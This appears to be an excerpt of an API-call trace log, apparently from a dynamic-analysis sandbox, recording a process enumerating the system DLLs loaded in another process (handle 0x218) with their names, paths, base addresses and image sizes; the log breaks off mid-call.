GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2522e78, cb=0x18 | out: lpmodinfo=0x2522e78*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0050.425] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0050.426] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0050.427] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2525038, cb=0x18 | out: lpmodinfo=0x2525038*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0050.427] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0050.427] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0050.428] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x2527220, cb=0x18 | out: lpmodinfo=0x2527220*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0050.428] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0050.429] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0050.429] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x25293f0, cb=0x18 | out: lpmodinfo=0x25293f0*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0050.430] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0050.430] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0050.431] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x252b608, cb=0x18 | out: lpmodinfo=0x252b608*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0050.431] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0050.432] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0050.433] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x252d7c8, cb=0x18 | out: lpmodinfo=0x252d7c8*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0050.433] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0050.434] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0050.435] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x252f988, cb=0x18 | out: lpmodinfo=0x252f988*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0050.435] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0050.436] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0050.437] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2531b48, cb=0x18 | out: lpmodinfo=0x2531b48*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0050.438] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0050.439] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0050.440] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2533da0, cb=0x18 | out: lpmodinfo=0x2533da0*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0050.441] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0050.442] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0050.443] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x2535f50, cb=0x18 | out: lpmodinfo=0x2535f50*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0050.444] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0050.445] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0050.446] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb720000, lpmodinfo=0x2538110, cb=0x18 | out: lpmodinfo=0x2538110*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0050.447] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb720000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0050.448] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb720000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0050.448] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x253a2e0, cb=0x18 | out: lpmodinfo=0x253a2e0*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0050.449] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0050.450] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0050.451] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x253c4b0, cb=0x18 | out: lpmodinfo=0x253c4b0*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0050.452] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0050.454] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0050.455] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x253e680, cb=0x18 | out: lpmodinfo=0x253e680*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0050.456] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0050.457] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0050.458] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x2540850, cb=0x18 | out: lpmodinfo=0x2540850*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0050.459] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0050.460] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0050.462] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x2542a20, cb=0x18 | out: lpmodinfo=0x2542a20*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0050.463] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0050.464] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0050.465] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x2544cf8, cb=0x18 | out: lpmodinfo=0x2544cf8*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0050.466] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0050.468] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0050.469] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefce90000, lpmodinfo=0x2546eb8, cb=0x18 | out: lpmodinfo=0x2546eb8*(lpBaseOfDll=0x7fefce90000, SizeOfImage=0x5b000, EntryPoint=0x7fefce96940)) returned 1 [0050.470] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefce90000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0050.472] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefce90000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DNSAPI.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0050.473] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff970000, lpmodinfo=0x2549078, cb=0x18 | out: lpmodinfo=0x2549078*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0050.475] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff970000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0050.476] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff970000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0050.477] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9c0000, lpmodinfo=0x254b250, cb=0x18 | out: lpmodinfo=0x254b250*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0050.479] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9c0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0050.480] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9c0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0050.482] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x254d400, cb=0x18 | out: lpmodinfo=0x254d400*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0050.483] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0050.485] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0050.486] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x254f5c0, cb=0x18 | out: lpmodinfo=0x254f5c0*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0050.488] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0050.489] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0050.491] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x2551780, cb=0x18 | out: lpmodinfo=0x2551780*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0050.493] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0050.494] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0050.496] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x2553950, cb=0x18 | out: lpmodinfo=0x2553950*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0050.497] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0050.499] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0050.501] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x2555b00, cb=0x18 | out: lpmodinfo=0x2555b00*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0050.503] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0050.505] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0050.507] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd610000, lpmodinfo=0x2557cd0, cb=0x18 | out: lpmodinfo=0x2557cd0*(lpBaseOfDll=0x7fefd610000, SizeOfImage=0xb000, EntryPoint=0x7fefd611030)) returned 1 [0050.508] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd610000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0050.510] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd610000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")) returned 0x1f [0050.512] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x2559e90, cb=0x18 | out: lpmodinfo=0x2559e90*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0050.514] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="SSPICLI.DLL") returned 0xb [0050.516] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SSPICLI.DLL" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0050.518] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcc70000, lpmodinfo=0x255c050, cb=0x18 | out: lpmodinfo=0x255c050*(lpBaseOfDll=0x7fefcc70000, SizeOfImage=0xa000, EntryPoint=0x7fefcc73cb8)) returned 1 [0050.520] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcc70000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="credssp.dll") returned 0xb [0050.522] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcc70000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")) returned 0x1f [0050.523] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb270000, lpmodinfo=0x255e210, cb=0x18 | out: lpmodinfo=0x255e210*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0050.525] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb270000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0050.527] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb270000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0050.529] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb260000, lpmodinfo=0x25603e0, cb=0x18 | out: lpmodinfo=0x25603e0*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0050.532] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb260000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0050.534] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb260000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0050.536] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd010000, lpmodinfo=0x25625a0, cb=0x18 | out: lpmodinfo=0x25625a0*(lpBaseOfDll=0x7fefd010000, SizeOfImage=0x55000, EntryPoint=0x7fefd011054)) returned 1 [0050.538] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd010000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0050.540] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd010000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")) returned 0x1f [0050.542] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefca10000, lpmodinfo=0x2564760, cb=0x18 | out: lpmodinfo=0x2564760*(lpBaseOfDll=0x7fefca10000, SizeOfImage=0x7000, EntryPoint=0x7fefca114b0)) returned 1 [0050.544] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefca10000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wshtcpip.dll") returned 0xc [0050.546] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefca10000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wshtcpip.dll" (normalized: "c:\\windows\\system32\\wshtcpip.dll")) returned 0x20 [0050.549] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd000000, lpmodinfo=0x2566b48, cb=0x18 | out: lpmodinfo=0x2566b48*(lpBaseOfDll=0x7fefd000000, SizeOfImage=0x7000, EntryPoint=0x7fefd00142c)) returned 1 [0050.551] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd000000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="wship6.dll") returned 0xa [0050.553] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd000000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")) returned 0x1e [0050.555] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9530000, lpmodinfo=0x2568d08, cb=0x18 | out: lpmodinfo=0x2568d08*(lpBaseOfDll=0x7fef9530000, SizeOfImage=0x8000, EntryPoint=0x7fef9531414)) returned 1 [0050.558] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9530000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0050.560] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9530000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")) returned 0x20 [0050.562] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefac50000, lpmodinfo=0x256aed8, cb=0x18 | out: lpmodinfo=0x256aed8*(lpBaseOfDll=0x7fefac50000, SizeOfImage=0x53000, EntryPoint=0x7fefac52b98)) returned 1 [0050.564] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefac50000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0050.567] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefac50000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")) returned 0x20 [0050.569] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x256d0a8, cb=0x18 | out: lpmodinfo=0x256d0a8*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0050.571] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0050.574] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0050.576] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0a0000, lpmodinfo=0x256f280, cb=0x18 | out: lpmodinfo=0x256f280*(lpBaseOfDll=0x7fefa0a0000, SizeOfImage=0x13000, EntryPoint=0x7fefa0ac390)) returned 1 [0050.579] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0a0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="umb.dll") returned 0x7 [0050.581] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0a0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\umb.dll" (normalized: "c:\\windows\\system32\\umb.dll")) returned 0x1b [0050.584] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb350000, lpmodinfo=0x2571430, cb=0x18 | out: lpmodinfo=0x2571430*(lpBaseOfDll=0x7fefb350000, SizeOfImage=0x19000, EntryPoint=0x7fefb3511a8)) returned 1 [0050.586] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb350000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="ATL.DLL") returned 0x7 [0050.589] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb350000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ATL.DLL" (normalized: "c:\\windows\\system32\\atl.dll")) returned 0x1b [0050.591] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x25735e0, cb=0x18 | out: lpmodinfo=0x25735e0*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0050.593] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0050.596] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0050.599] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x25757b0, cb=0x18 | out: lpmodinfo=0x25757b0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0050.601] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0050.604] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0050.606] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x2577970, cb=0x18 | out: lpmodinfo=0x2577970*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0050.609] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0050.612] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0050.615] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9fb0000, lpmodinfo=0x2579b30, cb=0x18 | out: lpmodinfo=0x2579b30*(lpBaseOfDll=0x7fef9fb0000, SizeOfImage=0xee000, EntryPoint=0x7fef9fc87d4)) returned 1 [0050.618] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9fb0000, lpBaseName=0x7841b0, nSize=0x800 | out: lpBaseName="localspl.dll") returned 0xc [0050.621] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9fb0000, lpFilename=0x7841b0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\localspl.dll" (normalized: "c:\\windows\\system32\\localspl.dll")) returned 0x20 [0050.624] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9f90000, lpmodinfo=0x257bd00, cb=0x18 | out: lpmodinfo=0x257bd00*(lpBaseOfDll=0x7fef9f90000, SizeOfImage=0x12000, EntryPoint=0x7fef9f91064)) returned 1 [0050.627] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9f90000, lpBaseName=0x7841b0, nSize=0x800 | out: 